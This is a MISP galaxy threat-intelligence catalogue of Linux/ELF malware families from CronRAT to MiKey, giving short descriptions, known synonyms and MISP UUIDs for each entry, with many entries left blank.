Metadata key	Value
type	[]

CronRAT

A malware written in Bash that hides in the Linux calendar system on February 31st. Observed in relation to Magecart attacks.

Internal MISP references

UUID c49062cc-ceef-4794-9d8a-93ede434ecfd which can be used as unique global reference for CronRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CyclopsBlink

According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard and ASUS devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.

Internal MISP references

UUID 76d4b754-e025-41c5-a767-7b00a39bd255 which can be used as unique global reference for CyclopsBlink in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dacls (ELF)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

Internal MISP references

UUID 2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b which can be used as unique global reference for Dacls (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dark

Mirai variant exploiting CVE-2021-20090 and CVE2021-35395 for spreading.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark.

Known Synonyms
`Dark.IoT`

Internal MISP references

UUID d499e7ad-332f-4057-b31d-a69916408057 which can be used as unique global reference for Dark in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkCracks

A sophisticated payload delivery and upgrade framework, discovered in 2024. DarkCracks exploits compromised GLPI and WordPress sites to function as Downloaders and C2 servers.

Internal MISP references

UUID 043c46fc-b98a-438e-b071-3ac76380f082 which can be used as unique global reference for DarkCracks in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dark Nexus

Internal MISP references

UUID dfba0c8f-9d06-448b-817e-6fffa1b22cb9 which can be used as unique global reference for Dark Nexus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkSide (ELF)

Internal MISP references

UUID 61796628-c37b-4284-9aa4-9f054cc6c3c2 which can be used as unique global reference for DarkSide (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkRadiation

Internal MISP references

UUID 39be337b-8a9a-4d71-949b-5efd6248fc80 which can be used as unique global reference for DarkRadiation in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DDG

First activity observed in October 2017. DDG is a botnet with P2P capability that is targeting crypto currency mining (Monero).

Internal MISP references

UUID 5c42585b-ea92-4fe2-8a79-bb47a3df67ad which can be used as unique global reference for DDG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ddoor

Internal MISP references

UUID 07f48866-647c-46b0-a0d4-29c81ad488a8 which can be used as unique global reference for ddoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DEADBOLT

DEADBOLT is a linux ransomware written in Go, targeting QNAP NAS devices worldwide. The files are encrypted with AES128 encryption and will have the .deadbolt extension appended to file names.

Internal MISP references

UUID b37c9ba2-f1b0-4a2f-9387-7310939d2189 which can be used as unique global reference for DEADBOLT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Decoy Dog RAT

Internal MISP references

UUID 6452720d-bd35-4c55-8178-ed0dd86f4c53 which can be used as unique global reference for Decoy Dog RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Denonia

Cado discovered this malware, written in Go and targeting AWS Lambda environments.

Internal MISP references

UUID d5d9bb86-715d-4d86-a4d2-ab73085d1b0c which can be used as unique global reference for Denonia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Derusbi (ELF)

Internal MISP references

UUID 494dcdfb-88cb-456d-a95a-252ff10c0ba9 which can be used as unique global reference for Derusbi (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DISGOMOJI

Internal MISP references

UUID 1f6098a1-2395-4329-8865-49602638f45a which can be used as unique global reference for DISGOMOJI in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dofloo

Dofloo (aka AESDDoS) is a popular malware used to create large scale botnets that can launch DDoS attacks and load cryptocurrency miners to the infected machines.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dofloo.

Known Synonyms
`AESDDoS`

Internal MISP references

UUID ffb5789f-d7e6-4723-a447-e5bb2fe713a0 which can be used as unique global reference for Dofloo in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo - webarchive

Associated metadata

Metadata key	Value
type	[]

Doki

Internal MISP references

UUID a5446b35-8613-4121-ada4-c0b1d6f72851 which can be used as unique global reference for Doki in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoubleFantasy (ELF)

Internal MISP references

UUID a41d8c89-8229-4936-96c2-4b194ebaf858 which can be used as unique global reference for DoubleFantasy (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DreamBus

Internal MISP references

UUID 22ff8eac-d92e-4c6e-829b-9b565d90eddd which can be used as unique global reference for DreamBus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ebury

This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.

This family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.

Internal MISP references

UUID ce79265c-a467-4a17-b27d-7ec7954688d5 which can be used as unique global reference for Ebury in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Echobot

The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.

When it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.

https://www.zdnet.com/article/new-echobot-malware-is-a-smorgasbord-of-vulnerabilities

Internal MISP references

UUID 040ac9c6-e3ab-4b51-88a9-5380101c74f8 which can be used as unique global reference for Echobot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Elevator

Internal MISP references

UUID 6ee05063-4f73-4a99-86a5-906164039a3a which can be used as unique global reference for Elevator in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EnemyBot

According to the Infosec Institute, EnemyBot is a dangerous IoT botnet that has made headlines in the last few weeks. This threat, which seems to be disseminated by the Keksec group, expanded its features by adding recent vulnerabilities discovered in 2022. It was designed to attack web servers, Android devices and content management systems (CMS) servers.

Internal MISP references

UUID 262d18be-7cab-46c2-bcb0-47fff17604aa which can be used as unique global reference for EnemyBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Erebus (ELF)

Internal MISP references

UUID 479353aa-c6d7-47a7-b5f0-3f97fd904864 which can be used as unique global reference for Erebus (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ESXiArgs

Ransomware used to target ESXi servers.

Internal MISP references

UUID 7550af7f-91cc-49e7-a4c5-d4e4d993cbef which can be used as unique global reference for ESXiArgs in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Evilginx

According to the author, Evilginx is a standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.

Internal MISP references

UUID 8eee410f-0538-4a6c-897b-c6bf4f9f28d7 which can be used as unique global reference for Evilginx in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EvilGnome

According to Infosec Institute, EvilGnome presents itself to unwitting Linux users as a legitimate GNOME extension. Legitimate extensions help to extend Linux functionality, but instead of a healthy boost in system functionality, EvilGnome begins spying on users with an array of functionalities uncommon for most Linux malware types.

Internal MISP references

UUID 149e693c-4b51-4143-9061-6a8698b0e7f5 which can be used as unique global reference for EvilGnome in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EwDoor

Internal MISP references

UUID e75eb723-7c23-4a3b-9419-cefb88e5f6b7 which can be used as unique global reference for EwDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Exaramel (ELF)

Internal MISP references

UUID 1e0540f3-bad3-403f-b8ed-ce40a276559e which can be used as unique global reference for Exaramel (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ext4

Internal MISP references

UUID 79b2b3c0-6119-4511-9c33-2a48532b6a60 which can be used as unique global reference for ext4 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Facefish

Internal MISP references

UUID 106487ea-a710-4546-bd62-bdbfa0b0447e which can be used as unique global reference for Facefish in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FBot

Internal MISP references

UUID 501e5434-5796-4d63-8539-d99ec48119c2 which can be used as unique global reference for FBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FinFisher (ELF)

Internal MISP references

UUID 44018d71-25fb-4959-b61e-d7af97c85131 which can be used as unique global reference for FinFisher (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

floodor

Internal MISP references

UUID ac30f2be-8153-4588-b29c-5e5863792930 which can be used as unique global reference for floodor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fodcha

Malware used to run a DDoS botnet.

Internal MISP references

UUID 4a64a1ca-e5bc-4a27-bff2-1c68cea05ba7 which can be used as unique global reference for Fodcha in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FontOnLake

This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.

It comes with a rootkit as well.

Internal MISP references

UUID c530d62b-e49f-4ccf-9c87-d9f6c16617b7 which can be used as unique global reference for FontOnLake in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FritzFrog

Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk.

Internal MISP references

UUID b43b7b4a-9cf4-4f98-b4d2-617a7d84bfa7 which can be used as unique global reference for FritzFrog in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gitpaste-12

Gitpaste-12 is a modular malware first observed in October 2020 targeting Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices. It uses GitHub and Pastebin as dead drop C2 locations.

Internal MISP references

UUID ffd09324-b585-49c0-97e5-536d386f49a5 which can be used as unique global reference for Gitpaste-12 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Glupteba Proxy

ARM32 SOCKS proxy, written in Go, used in the Glupteba campaign.

Internal MISP references

UUID bcfec1d3-ff29-4677-a5f6-be285e98a9db which can be used as unique global reference for Glupteba Proxy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GobRAT

Internal MISP references

UUID ddba032c-ebde-4736-b7ef-8376702dac6a which can be used as unique global reference for GobRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Godlua

Internal MISP references

UUID f3cb0a78-1608-44b1-9949-c6addf6c13ce which can be used as unique global reference for Godlua in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gomir

Internal MISP references

UUID 6fb012ce-c822-471c-9c15-4c7ecfb55528 which can be used as unique global reference for Gomir in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GOSH

Internal MISP references

UUID 931f57f9-1edd-47b8-bf80-ae7190434558 which can be used as unique global reference for GOSH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoTitan

GoTitan is a DDoS bot under development, which support ten different methods of launching distributed denial-of-service (DDoS) attacks: UDP, UDP HEX, TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD, and HTTP PUT.

Internal MISP references

UUID 92007a5e-d408-4c95-b4c2-7b4e4e29559e which can be used as unique global reference for GoTitan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GreedyAntd

Internal MISP references

UUID 6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3 which can be used as unique global reference for GreedyAntd in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gwisin (ELF)

Internal MISP references

UUID c02d252d-95cc-45bc-adb6-bae51b16c55b which can be used as unique global reference for Gwisin (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HabitsRAT (ELF)

Internal MISP references

UUID e87e7f26-f2a1-437f-8650-312050e3cd48 which can be used as unique global reference for HabitsRAT (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hadooken

Internal MISP references

UUID 84e9e1ec-3676-4d64-9134-c48221c03e38 which can be used as unique global reference for Hadooken in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Haiduc

Internal MISP references

UUID dd85732f-cbf8-4f2c-af5c-f51ef7d99b6a which can be used as unique global reference for Haiduc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hajime

Internal MISP references

UUID ff8ee85f-4175-4f5a-99e5-0cbc378f1489 which can be used as unique global reference for Hajime in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hakai

Internal MISP references

UUID 0839c28a-ea11-44d4-93d1-24b246ef6743 which can be used as unique global reference for Hakai in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HandyMannyPot

Internal MISP references

UUID 0b323b91-ad57-4127-99d1-6a2485be70df which can be used as unique global reference for HandyMannyPot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hand of Thief

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hand of Thief.

Known Synonyms
`Hanthie`

Internal MISP references

UUID db3e17f0-677b-4bdb-bc26-25e62a74673d which can be used as unique global reference for Hand of Thief in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HeadCrab

Internal MISP references

UUID 7bb684d8-ad5c-4d01-91eb-2c600dbcda2a which can be used as unique global reference for HeadCrab in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HellDown

Ransomware.

Internal MISP references

UUID 6dd0e6e4-536b-4271-a948-39282ff48940 which can be used as unique global reference for HellDown in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HelloBot (ELF)

Internal MISP references

UUID b9fec670-2b1e-4287-ac93-68360d5adcf4 which can be used as unique global reference for HelloBot (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HelloKitty (ELF)

Linux version of the HelloKitty ransomware.

Internal MISP references

UUID 785cadf7-5c99-40bc-b718-8a98d9aa90b7 which can be used as unique global reference for HelloKitty (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HiatusRAT

Lumen discovered this malware used in campaign targeting business-grade routers using a RAT they call HiatusRAT and a variant of tcpdump for traffic interception.

Internal MISP references

UUID 69dcee87-dc61-48d4-a6af-177396bdb850 which can be used as unique global reference for HiatusRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HiddenWasp

HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.

Internal MISP references

UUID ae00d48d-c515-4ca9-a29c-8c53a78f8c73 which can be used as unique global reference for HiddenWasp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hide and Seek

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hide and Seek.

Known Synonyms
`HNS`

Internal MISP references

UUID 41bf8f3e-bb6a-445d-bb74-d08aae61a94b which can be used as unique global reference for Hide and Seek in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HinataBot

HinataBot is a Go-based DDoS-focused botnet. It was observed in the first quarter of 2023 targeting HTTP and SSH endpoints leveraging old vulnerabilities and weak credentials. Amongst those infection vectors are exploitation of the miniigd SOAP service on Realtek SDK devices (CVE-2014-8361), Huawei HG532 routers (CVE-2017-17215), and exposed Hadoop YARN servers.

Internal MISP references

UUID b10fc382-b740-417a-98fa-e23d10223958 which can be used as unique global reference for HinataBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hipid

Internal MISP references

UUID d55eb2f1-e24d-4b50-9839-2e53b5059bae which can be used as unique global reference for Hipid in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hive (ELF)

Internal MISP references

UUID c22452c8-c818-4577-9737-0b87342c7913 which can be used as unique global reference for Hive (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Horse Shell

Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities: * Remote shell: Execution of arbitrary shell commands on the infected router * File transfer: Upload and download files to and from the infected router. * SOCKS tunneling: Relay communication between different clients.

Internal MISP references

UUID 9d04d96a-92fd-4731-a3b5-a3fdafd3e523 which can be used as unique global reference for Horse Shell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hubnr

Internal MISP references

UUID c55389b0-e778-4cf9-9030-3d1efc1224c9 which can be used as unique global reference for Hubnr in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HyperSSL (ELF)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HyperSSL (ELF).

Known Synonyms
`SysUpdate`

Internal MISP references

UUID 263aaef5-9758-49f1-aff1-9a509f545bb3 which can be used as unique global reference for HyperSSL (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

iceFire

Internal MISP references

UUID c03b2f7f-31ed-4133-b947-4b8846d90f19 which can be used as unique global reference for iceFire in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Icnanker

Internal MISP references

UUID cd9f128b-6502-4e1b-a5b3-25f3c7f01ca3 which can be used as unique global reference for Icnanker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

INC

Internal MISP references

UUID fa3f90a3-40e3-4636-90f9-3e02bf645afd which can be used as unique global reference for INC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IoT Reaper

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IoT Reaper.

Known Synonyms
`IoTroop`
`Reaper`
`iotreaper`

Internal MISP references

UUID 37c357a1-ec09-449f-b5a9-c1ef1fba2de2 which can be used as unique global reference for IoT Reaper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IPStorm (ELF)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IPStorm (ELF).

Known Synonyms
`InterPlanetary Storm`

Internal MISP references

UUID a24f9c4b-1fa7-4da2-9929-064345389e67 which can be used as unique global reference for IPStorm (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IZ1H9

ccording to Fortinet, this is a Mirai-based DDoS botnet.

Internal MISP references

UUID 6e98a149-9ce2-4750-9680-69f3ced5f33e which can be used as unique global reference for IZ1H9 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JenX

Internal MISP references

UUID 6a4365fc-8448-4270-ba93-0341788d004b which can be used as unique global reference for JenX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kaden

Kaden is a DDoS botnet that is heavily based on Bashlite/Gafgyt. Next to DDoS capabilities it contains wiper functionality, which currently can not be triggerred (yet).

Internal MISP references

UUID eebd19b4-6671-4b17-be6a-cc467e5869a5 which can be used as unique global reference for Kaden in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kaiji

Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.

Internal MISP references

UUID 33fe7943-c1b3-48d5-b287-126390b091f0 which can be used as unique global reference for Kaiji in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kaiten

According to netenrich, Kaiten is a Trojan horse that opens a back door on the compromised computer that allows it to perform other malicious activities. The trojan does not create any copies of itself. This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kaiten.

Known Synonyms
`STD`

Internal MISP references

UUID 9b618703-58f6-4f0b-83a4-d4f13e2e5d12 which can be used as unique global reference for Kaiten in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

kerberods

Internal MISP references

UUID e3787d95-2595-449e-8cf9-90845a9b7444 which can be used as unique global reference for kerberods in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KEYPLUG

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KEYPLUG.

Known Synonyms
`ELFSHELF`

Internal MISP references

UUID 2c4bfc14-3ea4-4ced-806a-fcac30b2a9d7 which can be used as unique global reference for KEYPLUG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

kfos

Internal MISP references

UUID 5e353bc2-4d32-409b-aeb6-c7df32607c56 which can be used as unique global reference for kfos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kinsing

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kinsing.

Known Synonyms
`h2miner`

Internal MISP references

UUID ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea which can be used as unique global reference for Kinsing in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KIVARS (ELF)

Internal MISP references

UUID e8b24118-4ce8-471b-8683-1077a0f5f2a9 which can be used as unique global reference for KIVARS (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kobalos

Internal MISP references

UUID 201d54ae-7fb0-4522-888c-758fa9019737 which can be used as unique global reference for Kobalos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Krasue RAT

Internal MISP references

UUID b111325d-dd90-47cc-8777-fcb7e610a76e which can be used as unique global reference for Krasue RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KrustyLoader

ELF x64 Rust downloader first discovered on Ivanti Connect Secure VPN after the exploitation of CVE-2024-21887 and CVE-2023-46805. Downloads Sliver backdoor and deletes itself.

Internal MISP references

UUID 1a5d8c38-42fa-4405-83fc-4e07b4407205 which can be used as unique global reference for KrustyLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KTLVdoor (ELF)

According to Trend Micro, KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning.

Internal MISP references

UUID 3ee0b08d-b872-4eda-8f8f-6d2f37b053ae which can be used as unique global reference for KTLVdoor (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kuiper (ELF)

Internal MISP references

UUID 30ad3f49-bffd-4383-88b3-067ccfac7038 which can be used as unique global reference for Kuiper (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lady

Internal MISP references

UUID f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d which can be used as unique global reference for Lady in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LeetHozer

Internal MISP references

UUID e9f2857a-cb91-4715-ac8b-fdc89bc9a03e which can be used as unique global reference for LeetHozer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lightning Framework

Internal MISP references

UUID 927bc8fc-fef4-4331-877d-18bcd33bdf9c which can be used as unique global reference for Lightning Framework in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LiLock

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LiLock.

Known Synonyms
`Lilocked`
`Lilu`

Internal MISP references

UUID 1328ed0d-9c1c-418b-9a96-1c538e4893bc which can be used as unique global reference for LiLock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

lilyofthevalley

Internal MISP references

UUID f789442f-8f50-4e55-8fbc-b93d22b5314e which can be used as unique global reference for lilyofthevalley in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Linodas

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Linodas.

Known Synonyms
`DinodasRAT`
`XDealer`

Internal MISP references

UUID e47295eb-e907-410a-ab16-62ed8652d8bf which can be used as unique global reference for Linodas in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LiquorBot

BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency.

Internal MISP references

UUID 3fe8f3db-4861-4e78-8b60-a794fe22ae3f which can be used as unique global reference for LiquorBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LockBit (ELF)

Internal MISP references

UUID afce6aba-d4c4-49fa-b9a9-1a70e92e5a0e which can be used as unique global reference for LockBit (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Loerbas

Loader and Cleaner components used in attacks against high-performance computing centers in Europe.

Internal MISP references

UUID 6332d57c-c46f-4907-8dac-965b15ffbed6 which can be used as unique global reference for Loerbas in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Log Collector

Internal MISP references

UUID 0473214a-2daa-4b5b-84bc-1bcbab11ef80 which can be used as unique global reference for Log Collector in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lootwodniw

Internal MISP references

UUID cfcf8608-03e7-4a5b-a46c-af342db2d540 which can be used as unique global reference for Lootwodniw in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Luna

ESXi encrypting ransomware written in Rust.

Internal MISP references

UUID bc9022d6-ee65-463f-9823-bc0f96963a75 which can be used as unique global reference for Luna in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Manjusaka (ELF)

Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.

Internal MISP references

UUID cd3a3a96-af66-4470-8115-b8bf3eef005a which can be used as unique global reference for Manjusaka (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Masuta

Masuta takes advantage of the EDB 38722 D-Link exploit.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Masuta.

Known Synonyms
`PureMasuta`

Internal MISP references

UUID b9168ff8-01df-4cd0-9f70-fe9e7a11eccd which can be used as unique global reference for Masuta in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Matryosh

Internal MISP references

UUID 4e989704-c49f-468c-95e1-1b7c5a58b3c4 which can be used as unique global reference for Matryosh in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Melofee

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Melofee.

Known Synonyms
`Mélofée`

Internal MISP references

UUID 1ffd85bd-389c-4e04-88fd-8186423c3691 which can be used as unique global reference for Melofee in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MESSAGETAP

MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.

Internal MISP references

UUID a07d6748-3557-41ac-b55b-f4348dc2a3c7 which can be used as unique global reference for MESSAGETAP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Midrashim

A x64 ELF file infector with non-destructive payload.

Internal MISP references

UUID fe220358-7118-4feb-b43e-cbdaf2ea09dc which can be used as unique global reference for Midrashim in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MiKey

Internal MISP references

